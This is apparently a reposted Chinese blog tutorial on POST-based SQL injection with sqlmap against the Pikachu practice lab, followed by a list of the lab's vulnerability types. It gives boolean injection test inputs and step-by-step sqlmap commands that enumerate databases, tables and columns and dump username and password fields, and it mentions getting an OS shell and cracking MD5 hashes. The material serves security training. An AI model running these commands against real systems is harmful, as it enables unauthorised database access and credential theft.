分享

sqlmap注入之(psot篇)

 AnonymousV脸 2019-04-07

sql注入(post篇)

SQL Inject漏洞攻击流程

  • 第一步:注入点探测自动方式:使用web漏洞扫描工具,自动进行注入点发现手动方式:手工构造sql inject测试语句进行注入点发现

  • 第二步:信息获取通过注入点取期望得到的数据。
    1.环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。
    2.数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)

  • 第三步:获取权限 3 获取操作系统权限: 通过数据库执行shell,上传木马

  • QL Inject 漏洞-注入点类型-数字类型判断

    测试提交:1 and 1=1猜测SQL:select 字段名 from 表名 where id =1 and 1=1;
    测试提交:1 and 1=2猜测SQL:select 字段名 from 表名 where id =1 and 1=2;

1

开始攻击

点击查询,然后我们利用burp抓包

将抓到的包全选复制,保存文件11.txt
并复制到sqlmap的根目录下/usr/share/sqlmap
开始攻击
执行命令

./sqlmap.py -r '11.txt' 

这样就开始了sqlmap注入攻击

2

获取数据库

./sqlmap -r '11.txt' --dbs

3

获取表

./sqlmap -r '11.txt' -D 数据库 --tables

4

获取表结构

./sqlmap.py -r '11.txt' -D 数据库 -T 表名 --columns

5

获取表数据

./sqlmap.py -r '11.txt' -D lou -T users -C 'username,password' --dump

6

解密MD5

漏洞平台介绍

Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。

Pikachu上的漏洞类型列表如下:

  • Burt Force(暴力破解漏洞)

  • XSS(跨站脚本漏洞)

  • CSRF(跨站请求伪造)

  • SQL-Inject(SQL注入漏洞)

  • RCE(远程命令/代码执行)

  • Files Inclusion(文件包含漏洞)

  • Unsafe file downloads(不安全的文件下载)

  • Unsafe file uploads(不安全的文件上传)

  • Over Permisson(越权漏洞)

  • ../../../(目录遍历)

  • I can see your ABC(敏感信息泄露)

  • PHP反序列化漏洞

  • XXE(XML External Entity attack)

  • 不安全的URL重定向

  • SSRF(Server-Side Request Forgery)

  • 管理工具

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多